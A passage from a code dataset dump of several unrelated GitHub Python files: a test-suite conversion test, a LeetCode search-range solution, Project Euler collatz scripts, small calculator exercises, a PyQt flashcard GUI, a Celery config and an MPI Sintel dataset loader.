self.assertEqual(tests.countTestCases(), 10)\n self.suite = self.loader.loadTestsFromNames(['tests.mock1.test_module1.MyTestClass1.test_1',\n 
'tests.mock1.test_module1.MyTestClass2.test_3',\n 'tests.mock1.test_module2.MyTestClass3.test_5',\n 'tests.mock1.test_module2.MyTestClass4.test_8'])\n tests = unishark.suite.convert(self.suite)\n self.assertEqual(len(tests), 2)\n self.assertEqual(sum([len(t) for t in tests]), 4)\n self.assertEqual(tests.countTestCases(), 4)\n from tests.mock1 import test_module1\n self.suite = self.loader.loadTestsFromModule(test_module1)\n tests = unishark.suite.convert(self.suite)\n self.assertEqual(len(tests), 1)\n self.assertEqual(sum([len(t) for t in tests]), 2)\n self.assertEqual(tests.countTestCases(), 4)\n self.suite = self.loader.loadTestsFromTestCase(test_module1.MyTestClass1)\n tests = unishark.suite.convert(self.suite)\n self.assertEqual(len(tests), 1)\n self.assertEqual(sum([len(t) for t in tests]), 1)\n self.assertEqual(tests.countTestCases(), 2)\n\n\nif __name__ == '__main__':\n unittest.main()","repo_name":"twitter-archive/unishark","sub_path":"tests/test_suite.py","file_name":"test_suite.py","file_ext":"py","file_size_in_byte":2443,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"32"} +{"seq_id":"33409943265","text":"from typing import List\nclass Solution:\n def searchRange(self, nums: List[int], target: int) -> List[int]:\n \"\"\"\n Given an array of integers nums sorted in ascending order, find the starting and ending position of a given target value.\n\n Time complexity: O(log n) since binary search algorithm is used.\n Binary search algorithm cuts the search space roughly in half on each iteration.\n\n Space complexity: O(1) since all work are done in place.\n\n Runtime beats 92.59% of python3 submission\n \"\"\"\n if not nums:\n return [-1, -1]\n n = len(nums)\n start, end = 0, n - 1\n while start <= end:\n mid = start + (end - start + 1 + 1)//2 - 1\n left = right = -1\n if nums[mid] == target:\n left = right = mid\n elif nums[start] == target:\n left = right = start\n elif nums[end] == target:\n left = right = end\n\n if 0 <= left and left < n:\n has_left = left - 1 >= 0 and nums[left-1] == target\n has_right = right + 1 < n and nums[right+1] == target\n while has_left or has_right:\n if has_left:\n left -= 1\n if has_right:\n right += 1\n has_left = left - 1 >= 0 and nums[left-1] == target\n has_right = right + 1 < n and nums[right+1] == target\n\n return [left, right]\n\n elif nums[mid] > target:\n # [0, mid - 1]\n end = mid - 1\n else:\n # [mid + 1, n]\n start = mid + 1\n\n return [-1, -1]\n\nif __name__ == \"__main__\":\n s = Solution()\n numbers = [[1, 2, 3, 4, 5, 6, 7, 9, 10], [1, 2, 3, 3, 4, 5, 6], [5, 7, 7, 8, 8, 10], [5, 7, 8, 8, 10], [1, 1], [1, 1], []]\n for x in numbers:\n for i in range(11):\n r = s.searchRange(x, i)\n print(\"searchRange({}, {}) = {}\".format(x, i, r))\n","repo_name":"alvinctk/google-tech-dev-guide","sub_path":"leetcode/google/tagged/find_first_and_last_position.py","file_name":"find_first_and_last_position.py","file_ext":"py","file_size_in_byte":2050,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"32"} +{"seq_id":"38009587798","text":"#\n# def collatz_len_gen(num):\n# series = [num]\n# while num != 1:\n# if num % 2 == 0:\n# num = num/2\n# series.append(num)\n#\n# else:\n# num = 3*num + 1\n# series.append(num)\n#\n# return len(series)\n#\n# def longest_collatz_below(num):\n# longest = 0\n# number = [1]\n# i = 1\n# while i < num:\n# i += 1\n# collatz_len_gen(i)\n#\n# if collatz_len_gen(i) > longest:\n# number.insert(0, i)\n# longest = collatz_len_gen(i)\n#\n# 
print('length is :', longest, 'number is :', number[0])\n#\n#\n# longest_collatz_below(1000000)\n\n# import time\n# start = time.time()\n#\n# def collatz_len(num):\n# series = [num]\n# count = 1\n# while num != 1:\n# if num % 2 == 0:\n# num = num / 2\n# if num in series:\n# count += series.index(num)\n# break\n# else:\n# series.append(num)\n# count += 1\n#\n# else:\n# num = 3 * num + 1\n# if num in series:\n# count += series[num].index()\n# break\n# else:\n# series.append(num)\n# count += 1\n#\n# return count\n#\n#\n# end = time.time()\n#\n# print(end - start)\n\n\n# 88888888888888888888888888888888888888888888888888\n#problem 14 project euler\n# import time\n# start=time.time()\n# has2={}\n# def collatz(x):\n# seq=[]\n# seq.append(x)\n# temp=x\n# while(temp>1):\n# if temp%2==0:\n# temp=int(temp/2)\n# if temp in has2:\n# seq+=has2[temp]\n# break\n# else:\n# seq.append(temp)\n# else:\n# temp=3*temp+1\n# if temp in has2:\n# seq+=has2[temp]\n# break\n# else:\n# seq.append(temp)\n#\n#\n# has2[x]=seq\n# return len(seq)\n#\n# num=0\n# greatest=0\n# for i in range(1000000):\n# c=collatz(i)\n# if num 1:\n if num % 2 == 0:\n num = int(num/2)\n if num in dic:\n seq += dic[num]\n break\n else:\n seq.append(num)\n else:\n num = int(3*num+1)\n if num in dic:\n seq += dic[num]\n break\n else:\n seq.append(num)\n\n dic[num] = seq\n return len(seq)\n\nnumber = 0\nlength = 0\nfor i in range(1, 1000000):\n c = collatz(i)\n if length < c:\n length = c\n number = i\nend = time.time()\nprint(\"\\nthe number is :\", number , \"\\nthe length of seq is :\", length, \"\\nexecute time is:\", (end - start))\n\n\n\n\n","repo_name":"Shivashankar101/PycharmProjects","sub_path":"ProjectEuler/Euler14.py","file_name":"Euler14.py","file_ext":"py","file_size_in_byte":2948,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"9618929587","text":"myBill = float(input(\"What was the bill?: \"))\nnumberOfPeople = int(input(\"How many people?: \"))\ntip = int(input(\"your tip 'choose 15,20, 25 percentage': \"))\n\ntotalbillwithtip = tip / 100 * myBill + myBill\nbillperperson= totalbillwithtip / numberOfPeople\n\nfinal_amount = round(billperperson, 2)\n\n\nprint(\"You all owe\", final_amount)\n\n","repo_name":"GAYATHRI-2002/100daysofcodechallenge","sub_path":"DAYS/day9.py","file_name":"day9.py","file_ext":"py","file_size_in_byte":332,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"33199211349","text":"from crammer import controller\nimport os, sys \nfrom PyQt4 import QtGui, QtCore\nfrom crammer.controller import FlashCardController\n\nclass NoTypeTextEdit(QtGui.QTextEdit):\n\n\tdef keyPressEvent(self, event):\n\t\tevent.ignore()\n\nclass OptionsTab(QtGui.QWidget):\n\t\n\tdef __init__(self, parent, parentWidget):\n\t\tsuper(OptionsTab, self).__init__(parent)\n\t\tself.parent = parent\n\t\tself.parentWidget = parentWidget\n\t\tself.initUI()\n\n\t\t\n\tdef initUI(self):\n\t\tpass\n\t\tself.layout = QtGui.QHBoxLayout() \n\n\t\tself.apiKeysLayout = QtGui.QGridLayout()\n\n\t\tself.apiKeyTable = APIKeyTable(controller.apiKeys())\n\t\tself.apiKeysLayout.addWidget(self.apiKeyTable, 0, 1, 1, 2)\n\n\t\teditKeysButton = QtGui.QPushButton('Edit Keys', self)\n\t\teditKeysButton.clicked.connect(self.parentWidget.editKeys)\n\t\tself.apiKeysLayout.addWidget(editKeysButton, 1, 2, )\n\t\tself.layout.addLayout(self.apiKeysLayout)\n\n\t\tspacer = 
QtGui.QSpacerItem(200,40,QtGui.QSizePolicy.Minimum,QtGui.QSizePolicy.Expanding)\n\t\tself.layout.addItem(spacer)\n\n\t\tverticalLine \t= QtGui.QFrame()\n\t\tverticalLine.setFrameStyle(QtGui.QFrame.VLine)\n\t\tverticalLine.setSizePolicy(QtGui.QSizePolicy.Minimum,QtGui.QSizePolicy.Expanding)\n\t\tself.layout.addWidget(verticalLine)\n\n\t\tself.rightSide = QtGui.QVBoxLayout()\n\t\tself.rightForm = QtGui.QFormLayout()\n\t\tself.delay = QtGui.QLineEdit(str(30))\n\t\tself.rightForm.addRow('Delay:', self.delay)\n\n\t\tself.rightSide.addLayout(self.rightForm)\n\n\t\tself.startButton = QtGui.QPushButton('Start', self)\n\t\tself.startButton.clicked.connect(self.startThread)\n\t\tself.rightSide.addWidget(self.startButton)\n\n\t\tself.layout.addLayout(self.rightSide)\n\t\tself.setLayout(self.layout)\n\n\tdef getDelay(self):\n\t\treturn int(self.delay.text())\n\n\tdef startThread(self):\n\t\tself.parentWidget.start()\n\t\tself.startButton.setEnabled(False)\n\nclass DeckWindow(QtGui.QMainWindow):\n\t\n\tdef __init__(self, cardFile = None):\n\t\tsuper(DeckWindow, self).__init__()\n\t\tself.mainWidget = DeckWidget(self, cardFile)\n\t\tself.setCentralWidget(self.mainWidget)\n\t\tself.initUI()\n\t\t\n\tdef initUI(self):\n\t\tself.setWindowTitle('Macys Suit Getter')\n\t\tself.setGeometry(300,300,622,280)\n\t\tself.show()\n\t\n\tdef showAbout(self):\n\t\tmsgBox = QtGui.QMessageBox()\n\t\tmsgBox.setWindowTitle(\"About\")\n\t\tmsgBox.setText(\"Copy a Macys Suit URl into the field and press the button. Enter a file name (with .csv or whatever). It makes it a csv.\\nCreated by Luke Li on March 10, 2014\")\n\t\tmsgBox.exec_()\n\nclass DeckWidget(QtGui.QWidget):\n\t\n\tdef __init__(self, parent, cardFile):\n\t\tsuper(DeckWidget, self).__init__(parent)\n\t\tself.parent = parent\n\t\tself.cardFile = cardFile\n\t\tself.initUI()\n\t\t\n\tdef makeFocus(self):\n\t\tself.setFocus()\n\t\tself.grabKeyboard()\n\n\tdef initUI(self):\n\t\tif not self.hasFocus():\n\t\t\tself.makeFocus()\n\t\tself.flashCards = FlashCardTable(self.cardFile)\n\t\tmainLayout = QtGui.QVBoxLayout() \n\n\t\ttopBar = QtGui.QHBoxLayout()\n\t\ttopBar.addWidget(self.flashCards)\n\n\t\tmainLayout.addLayout(topBar)\n\t\tself.setLayout(mainLayout)\n\n\nclass FlashCardTable(QtGui.QTableWidget):\n\tdef __init__(self, *args):\n\t\tQtGui.QTableWidget.__init__(self, data, *args)\n\t\tself.data = data\n\t\tself.setColumnCount(4)\n\t\theaderLabels = ['Test?', '#', 'Front Side', 'Back Side']\n\t\tself.setHorizontalHeaderLabels(headerLabels)\n\t\tself.verticalHeader().hide()\n\t\tself.setData()\n\t\tself.resizeColumnsToContents()\n\n\tdef setData(self):\n\t\tpass\n\t\t'''\n\t\tself.setRowCount(len(self.data))\n\t\tn = 0\n\t\tfor key in self.data:\n\t\t\tlabelItem = QtGui.QTableWidgetItem(key)\n\t\t\tlabelItem.setFlags(QtCore.Qt.ItemIsSelectable | QtCore.Qt.ItemIsEnabled)\n\t\t\thasKey = self.data[key] != ''\n\t\t\tvalueItem = QtGui.QTableWidgetItem(str(hasKey))\n\t\t\tvalueItem.setFlags(QtCore.Qt.ItemIsSelectable | QtCore.Qt.ItemIsEnabled)\n\t\t\tself.setItem(n, 0, labelItem)\n\t\t\tself.setItem(n, 1, valueItem)\n\t\t\tn += 1\n\t\t'''\nclass FlashCardWindow(QtGui.QMainWindow):\n\t\n\tdef __init__(self, cardFile = None, preExistingCards = None):\n\t\tsuper(FlashCardWindow, self).__init__()\n\t\tself.deck = controller.makeCards(f = cardFile, cards = preExistingCards)\n\t\tself.controller = FlashCardController(self, self.deck)\n\t\tself.curController = self.controller\n\t\tself.mainWidget = FlashCardWidget(self, 
self.curController)\n\t\tself.setCentralWidget(self.mainWidget)\n\t\tself.initUI()\n\t\t\n\tdef initUI(self):\n\t\tself.setWindowTitle('Macys Suit Getter')\n\t\tself.setGeometry(300,300,622,280)\n\t\tself.show()\n\t\n\tdef showAbout(self):\n\t\tmsgBox = QtGui.QMessageBox()\n\t\tmsgBox.setWindowTitle(\"About\")\n\t\tmsgBox.setText(\"Copy a Macys Suit URl into the field and press the button. Enter a file name (with .csv or whatever). It makes it a csv.\\nCreated by Luke Li on March 10, 2014\")\n\t\tmsgBox.exec_()\n\n\tdef showResults(self, controller):\n\t\tself.resultsScreen = ResultsWidget(self, controller) \n\t\tself.setCentralWidget(self.resultsScreen)\n\n\tdef showRestartDeck(self, controller):\n\t\tself.mainWidget = FlashCardWidget(self, controller)\n\t\tself.setCentralWidget(self.mainWidget)\n\n\tdef showRestartAllDeck(self):\n\t\tself.controller.restartAll()\n\t\tself.mainWidget = FlashCardWidget(self, self.controller)\n\t\tself.setCentralWidget(self.mainWidget)\n\nclass FlashCardWidget(QtGui.QWidget):\n\t\n\tdef __init__(self, parent, controller):\n\t\tsuper(FlashCardWidget, self).__init__(parent)\n\t\tself.parent = parent\n\t\tself.controller = controller\n\t\tself.initUI()\n\t\t\n\tdef makeFocus(self):\n\t\tself.setFocus()\n\t\tself.grabKeyboard()\n\n\tdef initUI(self):\n\t\tif not self.hasFocus():\n\t\t\tself.makeFocus()\n\t\tself.cardLabel = QtGui.QLabel()\n\t\tcard = QtGui.QLabel('Card')\n\t\tsideLabel = QtGui.QLabel('Front Side')\n\t\tmainLayout = QtGui.QVBoxLayout() \n\n\t\ttopBar = QtGui.QHBoxLayout()\n\t\ttopBar.addWidget(self.cardLabel)\n\t\ttopBar.addWidget(sideLabel)\n\t\tsideLabel.setSizePolicy(QtGui.QSizePolicy.Preferred,QtGui.QSizePolicy.Fixed)\n\t\tmiddleBar = QtGui.QHBoxLayout()\n\t\tself.shownSide = QtGui.QLabel()\n\t\tself.shownSide.setWordWrap(True)\n\t\tself.shownSide.setTextInteractionFlags(QtCore.Qt.TextSelectableByMouse)\n\t\tbigFont = QtGui.QFont(\"Arial\", 20)\n\t\tself.shownSide.setFont(bigFont)\n\t\tmiddleBar.addWidget(self.shownSide)\n\n\t\tself.previousButton = QtGui.QPushButton('Last', self)\n\t\tself.previousButton.clicked.connect(self.previous)\n\t\tflipButton = QtGui.QPushButton('Flip', self)\n\t\tflipButton.clicked.connect(self.flip)\n\t\tself.knownCheckbox = QtGui.QCheckBox('Known', self)\n\t\tself.knownCheckbox.clicked.connect(self.modifyKnown)\n\t\tself.nextButton = QtGui.QPushButton('Next', self)\n\t\tself.nextButton.clicked.connect(self.next)\n\t\tself.copyButton = QtGui.QPushButton('Copy Side', self)\n\t\tself.copyButton.clicked.connect(self.copySide)\n\t\tself.lookupButton = QtGui.QPushButton('Look up Side', self)\n\t\tself.lookupButton.clicked.connect(self.lookup)\n\n\t\tbottomBar = QtGui.QHBoxLayout()\n\t\tbottomBar.addWidget(self.previousButton)\n\t\tbottomBar.addWidget(flipButton)\n\t\tbottomBar.addWidget(self.knownCheckbox)\n\t\tbottomBar.addWidget(self.nextButton)\n\t\tbottomBar.addWidget(self.copyButton)\n\t\tbottomBar.addWidget(self.lookupButton)\n\n\t\tself.definitionBox = QtGui.QLineEdit()\n\t\tself.getDefinitionButton = QtGui.QPushButton('Get Definition', self)\n\t\tself.getDefinitionButton.clicked.connect(self.getDefinition)\n\t\tnaverBar = QtGui.QHBoxLayout()\n\t\tnaverBar.addWidget(self.definitionBox)\n\t\tnaverBar.addWidget(self.getDefinitionButton)\n\n\t\tmainLayout.addLayout(topBar)\n\t\tmainLayout.addLayout(middleBar)\n\t\tmainLayout.addLayout(bottomBar)\n\t\tmainLayout.addLayout(naverBar)\n\t\tself.setLayout(mainLayout)\n\n\t\tself.showCard()\n\t\tself.updateGui()\n\n\tdef 
flip(self):\n\t\tif(self.showingFront):\n\t\t\tself.shownSide.setText(self.curCard.getBack())\n\t\t\tself.showingFront = False\n\t\telse:\n\t\t\tself.shownSide.setText(self.curCard.getFront())\n\t\t\tself.showingFront = True\n\n\tdef getDefinition(self):\n\t\tfrom crammer.model import koreanUtils\n\t\tword = self.shownSide.text()\n\t\tself.definitionBox.setText(str(koreanUtils.getDefinition(word)))\n\n\tdef next(self):\n\t\tif(self.controller.getCardNumber() + 1 < self.controller.size()):\n\t\t\tself.controller.nextCard()\n\t\t\tself.showCard()\n\t\t\tself.updateGui()\n\t\telse:\n\t\t\tself.releaseKeyboard()\n\t\t\tself.parent.showResults(self.controller)\n\n\tdef previous(self):\n\t\tif(self.controller.getCardNumber() > 0):\n\t\t\tself.controller.previousCard()\n\t\t\tself.showCard()\n\t\t\tself.updateGui()\n\t\telse:\n\t\t\tprint(\"OOPS\")\n\n\tdef showCard(self):\n\t\tself.curCard = self.controller.getCurCard()\n\t\tself.showingFront = True\n\n\tdef copySide(self):\n\t\tclipboard = QtGui.QApplication.clipboard()\n\t\ttext = self.shownSide.text()\n\t\tclipboard.setText(text)\n\n\tdef lookup(self):\n\t\ttext = self.shownSide.text()\n\t\timport webbrowser\n\t\tnaverlink = 'http://endic.naver.com/search.nhn?sLn=en&searchOption=all&query='\n\t\tlink = '%s%s' %(naverlink, text)\n\t\twebbrowser.open(link)\n\n\tdef modifyKnown(self):\n\t\tcardStatus = self.controller.curCardStatus()\n\t\tself.controller.setCardStatus(not cardStatus)\n\t\tself.knownCheckbox.setChecked(self.controller.curCardStatus())\n\n\tdef updateGui(self):\n\t\tself.shownSide.setText(self.curCard.getFront())\n\t\tself.cardLabel.setText(\"Card %s/%s\" %(self.controller.getCardNumber()+1, self.controller.size()))\n\t\tif(self.controller.getCardNumber() == 0):\n\t\t\tself.previousButton.setEnabled(False)\n\t\telse:\n\t\t\tself.previousButton.setEnabled(True)\n\n\t\tif(self.controller.getCardNumber() == self.controller.size()-1):\n\t\t\tself.nextButton.setText(\"To Results!\")\n\t\telse:\n\t\t\tself.nextButton.setText('Next')\n\n\t\tself.knownCheckbox.setChecked(self.controller.curCardStatus())\n\n\tdef keyPressEvent(self, e):\n\t\tif (e.key() == QtCore.Qt.Key_Right):\n\t\t\tself.next()\n\t\telif(e.key() == QtCore.Qt.Key_Left):\n\t\t\tself.previous()\n\t\telif(e.key() == QtCore.Qt.Key_Down or e.key() == QtCore.Qt.Key_Up):\n\t\t\tself.flip()\n\t\telif(e.key() == QtCore.Qt.Key_Space):\n\t\t\tself.modifyKnown()\n\n\tdef numCards(self):\n\t\treturn self.controller.size()\n\nclass ResultsWidget(QtGui.QWidget):\n\t\n\tdef __init__(self, parent, controller):\n\t\tsuper(ResultsWidget, self).__init__(parent)\n\t\tself.parent = parent\n\t\tself.controller = controller\n\t\tself.initUI()\n\t\t\n\tdef initUI(self):\n\t\tif not self.hasFocus():\n\t\t\tself.setFocus()\n\t\t\tself.grabKeyboard()\n\t\tself.knownCards = self.controller.knownCards()\n\t\tself.statusLabel = QtGui.QLabel(\"Try Harder!\")\n\t\tself.knownLabel = QtGui.QLabel('You knew %s/%s cards!' 
%(self.controller.knownCards(), self.controller.size()))\n\t\tself.keepCheckBox = QtGui.QCheckBox('Keep all known cards', self)\n\t\tmainLayout = QtGui.QVBoxLayout() \n\n\t\tself.restartButton = QtGui.QPushButton('Restart', self)\n\t\tself.restartButton.clicked.connect(self.restart)\n\t\tself.restartAllButton = QtGui.QPushButton('Restart All', self)\n\t\tself.restartAllButton.clicked.connect(self.restartAll)\n\t\tself.endButton = QtGui.QPushButton('End', self)\n\t\tself.endButton.clicked.connect(self.next)\n\n\t\trestartBar = QtGui.QHBoxLayout()\n\t\trestartBar.addWidget(self.restartButton)\n\t\trestartBar.addWidget(self.restartAllButton)\n\n\t\tbottomBar = QtGui.QHBoxLayout()\n\t\tbottomBar.addWidget(self.endButton)\n\n\t\tmainLayout.addWidget(self.statusLabel)\n\t\tmainLayout.addWidget(self.knownLabel)\n\t\tmainLayout.addWidget(self.keepCheckBox)\n\t\tmainLayout.addLayout(restartBar)\n\t\tmainLayout.addLayout(bottomBar)\n\t\tself.setLayout(mainLayout)\n\n\n\tdef flip(self):\n\t\tif(self.showingFront):\n\t\t\tself.shownSide.setText(self.curCard.getBack())\n\t\t\tself.showingFront = False\n\t\telse:\n\t\t\tself.shownSide.setText(self.curCard.getFront())\n\t\t\tself.showingFront = True\n\n\tdef next(self):\n\t\tif(controller.cardNumber + 1 < len(controller.deck)):\n\t\t\tcontroller.nextCard()\n\t\t\tself.showCard()\n\t\t\tself.updateGui()\n\t\telse:\n\t\t\tself.parent.showResults()\n\n\tdef restart(self):\n\t\tnewController = self.controller if self.keepCheckBox.isChecked() else self.controller.newControllerUnknownCards()\n\t\tnewController.restartAll()\n\t\tself.parent.showRestartDeck(newController)\n\n\tdef restartAll(self):\n\t\tself.parent.showRestartAllDeck()\n\n\tdef showCard(self):\n\t\tself.curCard = controller.getCurCard()\n\t\tself.showingFront = True\n\n\tdef keyPressEvent(self, e):\n\t\tif (e.key() == QtCore.Qt.Key_Right):\n\t\t\tself.restart()\n\nclass APIKeyTable(QtGui.QTableWidget):\n\tdef __init__(self, data, *args):\n\t\tQtGui.QTableWidget.__init__(self, *args)\n\t\tself.data = data\n\t\tself.setColumnCount(2)\n\t\theaderLabels = ['API', 'Has Key']\n\t\tself.setHorizontalHeaderLabels(headerLabels)\n\t\tself.verticalHeader().hide()\n\t\tself.setData()\n\t\tself.resizeColumnsToContents()\n\n\tdef setData(self):\n\t\tpass\n\t\t'''\n\t\tself.setRowCount(len(self.data))\n\t\tn = 0\n\t\tfor key in self.data:\n\t\t\tlabelItem = QtGui.QTableWidgetItem(key)\n\t\t\tlabelItem.setFlags(QtCore.Qt.ItemIsSelectable | QtCore.Qt.ItemIsEnabled)\n\t\t\thasKey = self.data[key] != ''\n\t\t\tvalueItem = QtGui.QTableWidgetItem(str(hasKey))\n\t\t\tvalueItem.setFlags(QtCore.Qt.ItemIsSelectable | QtCore.Qt.ItemIsEnabled)\n\t\t\tself.setItem(n, 0, labelItem)\n\t\t\tself.setItem(n, 1, valueItem)\n\t\t\tn += 1\n\t\t'''\n\ndef main(f, cards):\n\t\n\tapp = QtGui.QApplication(sys.argv)\n\tdb = 'decks.db'\n\tex = FlashCardWindow(cardFile = f, preExistingCards = cards)\n\tsys.exit(app.exec_())\n\n","repo_name":"ll2585/reader","sub_path":"crammer/gui/gui.py","file_name":"gui.py","file_ext":"py","file_size_in_byte":12715,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"74217074332","text":"#Sals Shipping\n\ndef print_cheapest_shipping_method(weight):\n print(\"The cheapest option available is $%.2f with %s shipping\")\n\ndef ground_ship(weight):\n if weight >= 10:\n cost = 4.75\n elif weight >= 6:\n cost = 4\n elif weight >= 2:\n cost = 3\n elif weight >= 0:\n cost = 1.50\n total_cost = weight * cost + 20\n print(total_cost)\n return(total_cost) # 
have the function return the calculated value\n\npremium_ship = 125\n\ndef drone_ship(weight):\n if weight >= 10:\n cost = 14.25\n elif weight >= 6:\n cost = 12\n elif weight >= 2:\n cost = 9\n elif weight >= 0:\n cost = 4.5\n total_cost = weight * cost\n print(total_cost)\n return(total_cost) # have the function return the calculated value\n\nground_ship(10)\ndrone_ship(1.5)\n\ndef best_deal(weight):\n # now you can compare values, by calling each function with the given 'weight'\n if ground_ship(weight) < drone_ship(weight) and ground_ship(weight) < premium_ship:\n method = \"standard ground\"\n cost = ground_ship(weight) # get the cost from the function calculation\n\n elif premium_ship < drone_ship(weight) and premium_ship < ground_ship(weight):\n method = \"premium\"\n cost = premium_ship # in this case, premium_ship is a value\n else:\n method = \"drone\"\n cost = drone_ship(weight) # get the cost from the function calculation\n\n print(\"The cheapest option for your package is \" + method + \" shipping and the cost will be $\" + str(cost))\n\nbest_deal(10)","repo_name":"zahariromanov/Python","sub_path":"Introduction/salsshipping.py","file_name":"salsshipping.py","file_ext":"py","file_size_in_byte":1448,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"30704508124","text":"from docassemble.base.config import daconfig\n\nbroker_heartbeat = 30\ntask_serializer = 'pickle'\naccept_content = ['pickle']\nresult_serializer = 'pickle'\ntimezone = daconfig.get('timezone', 'America/New_York')\nenable_utc = True\nbroker_connection_retry = True\nbroker_connection_retry_on_startup = True\n\nif daconfig.get('has_celery_single_queue', False):\n task_routes = {\"docassemble.webapp.worker.ocr_page\": {\"queue\": \"single\"}}\nif 'celery processes' in daconfig:\n worker_concurrency = daconfig['celery processes']\n","repo_name":"jhpyle/docassemble","sub_path":"docassemble_webapp/docassemble/webapp/config_worker.py","file_name":"config_worker.py","file_ext":"py","file_size_in_byte":518,"program_lang":"python","lang":"en","doc_type":"code","stars":686,"dataset":"github-code","pt":"32"} +{"seq_id":"72566104090","text":"import os.path\r\nimport glob\r\nfrom .listdataset import ListDataset\r\nfrom datasets.util import split2list\r\nfrom utils import co_flow_and_images_transforms\r\nfrom imageio import imread\r\nfrom .listdataset import load_flo\r\nimport numpy as np\r\nimport cv2\r\nfrom datasets.dataset_split import train_test_split_dir\r\n\r\n\r\n\r\n'''\r\nextracted from https://github.com/ClementPinard/FlowNetPytorch/tree/master/datasets\r\nDataset routines for MPI Sintel.\r\nhttp://sintel.is.tue.mpg.de/\r\nclean version imgs are without shaders, final version imgs are fully rendered\r\nThe datasets is not very big, you might want to only pretrain on it for flownet\r\n'''\r\n\r\n\r\ndef make_dataset(dataset_dir, split, dataset_type='clean'):\r\n flow_dir = 'flow'\r\n assert(os.path.isdir(os.path.join(dataset_dir,flow_dir)))\r\n img_dir = dataset_type\r\n assert(os.path.isdir(os.path.join(dataset_dir,img_dir)))\r\n\r\n images = []\r\n for flow_map in sorted(glob.glob(os.path.join(dataset_dir,flow_dir,'*','*.flo'))):\r\n flow_map = os.path.relpath(flow_map,os.path.join(dataset_dir,flow_dir))\r\n\r\n scene_dir, filename = os.path.split(flow_map)\r\n no_ext_filename = os.path.splitext(filename)[0]\r\n prefix, frame_nb = no_ext_filename.split('_')\r\n frame_nb = int(frame_nb)\r\n img1 = os.path.join(img_dir, scene_dir, 
'{}_{:04d}.png'.format(prefix, frame_nb + 1))\r\n img2 = os.path.join(img_dir, scene_dir, '{}_{:04d}.png'.format(prefix, frame_nb))\r\n # img2 is target, which corresponds to the first image for sintel\r\n flow_map = os.path.join(flow_dir, flow_map)\r\n if not (os.path.isfile(os.path.join(dataset_dir,img1)) and os.path.isfile(os.path.join(dataset_dir,img2))):\r\n continue\r\n images.append([[img1,img2],flow_map])\r\n\r\n return split2list(images, split, default_split=0.87)\r\n\r\n\r\ndef mpisintel_loader(root, path_imgs, path_flo):\r\n imgs = [os.path.join(root,path) for path in path_imgs]\r\n flo = os.path.join(root,path_flo)\r\n\r\n invalid_mask_dir = 'invalid'\r\n occlusion_mask_dir = 'occlusions'\r\n\r\n scene_dir, filename = os.path.split(path_flo)\r\n flow, scene_dir = os.path.split(scene_dir)\r\n filename = filename[:-4]\r\n\r\n path_invalid_mask = os.path.join(invalid_mask_dir, scene_dir, '{}.png'.format(filename))\r\n invalid_mask = cv2.imread(os.path.join(root, path_invalid_mask), 0).astype(np.uint8)\r\n valid_mask = (invalid_mask == 0)\r\n\r\n # if want to remove occluded regions\r\n path_occlusion_mask = os.path.join(occlusion_mask_dir, scene_dir, '{}.png'.format(filename))\r\n occluded_mask = cv2.imread(os.path.join(root, path_occlusion_mask), 0).astype(np.uint8)\r\n noc_mask = (occluded_mask == 0).astype(np.uint8)\r\n\r\n return [imread(img).astype(np.uint8) for img in imgs], load_flo(flo), valid_mask.astype(np.uint8)\r\n\r\n\r\ndef mpisintel_allpair_loader(root, path_imgs, path_flo):\r\n imgs = [os.path.join(root, path) for path in path_imgs]\r\n flo = os.path.join(root, path_flo)\r\n mask = os.path.join(os.path.dirname(flo), 'occlusion.png')\r\n return [imread(img).astype(np.uint8) for img in imgs], load_flo(flo), 1 - imread(mask).astype(np.float32)/255\r\n\r\n\r\ndef mpi_sintel_clean(root, source_image_transform=None, target_image_transform=None, flow_transform=None,\r\n co_transform=None, split=None):\r\n train_list, test_list = make_dataset(root, split, 'clean')\r\n train_dataset = ListDataset(root, train_list, source_image_transform=source_image_transform,\r\n target_image_transform=target_image_transform,\r\n flow_transform=flow_transform,\r\n co_transform=co_transform, loader=mpisintel_loader, mask=True)\r\n test_dataset = ListDataset(root, test_list, source_image_transform=source_image_transform,\r\n target_image_transform=target_image_transform,\r\n flow_transform=flow_transform,\r\n co_transform=co_transform, loader=mpisintel_loader, mask=True)\r\n return train_dataset, test_dataset\r\n\r\n\r\ndef mpi_sintel_final(root, source_image_transform=None, target_image_transform=None, flow_transform=None,\r\n co_transform=None, split=None):\r\n train_list, test_list = make_dataset(root, split, 'final')\r\n train_dataset = ListDataset(root, train_list, source_image_transform=source_image_transform,\r\n target_image_transform=target_image_transform,\r\n flow_transform=flow_transform,\r\n co_transform=co_transform, loader=mpisintel_loader, mask=True)\r\n test_dataset = ListDataset(root, test_list, source_image_transform=source_image_transform,\r\n target_image_transform=target_image_transform,\r\n flow_transform=flow_transform,\r\n co_transform=co_transform, loader=mpisintel_loader, mask=True)\r\n\r\n return train_dataset, test_dataset\r\n\r\n\r\ndef mpi_sintel_both(root, source_image_transform=None, target_image_transform=None, flow_transform=None,\r\n co_transform=None, test_image_transform=None, split=None):\r\n '''load images from both clean and final folders.\r\n We 
cannot shuffle input, because it would very likely cause data snooping\r\n for the clean and final frames are not that different'''\r\n #assert(isinstance(split, str)), 'To avoid data snooping, you must provide a static list of train/val when dealing with both clean and final.'\r\n ' Look at Sintel_train_val.txt for an example'\r\n train_list1, test_list1 = make_dataset(root, split, 'clean')\r\n train_list2, test_list2 = make_dataset(root, split, 'final')\r\n train_dataset = ListDataset(root, train_list1 + train_list2, source_image_transform=source_image_transform,\r\n target_image_transform=target_image_transform,\r\n flow_transform=flow_transform,\r\n co_transform=co_transform, loader=mpisintel_loader, mask=True)\r\n if test_image_transform is None:\r\n test_dataset = ListDataset(root, test_list1 + test_list2, source_image_transform=source_image_transform,\r\n target_image_transform=target_image_transform,\r\n flow_transform=flow_transform,\r\n co_transform=co_flow_and_images_transforms.CenterCrop((384, 1024)),\r\n loader=mpisintel_loader, mask=True)\r\n else:\r\n test_dataset = ListDataset(root, test_list1 + test_list2, source_image_transform=test_image_transform,\r\n target_image_transform=test_image_transform,\r\n flow_transform=flow_transform,\r\n 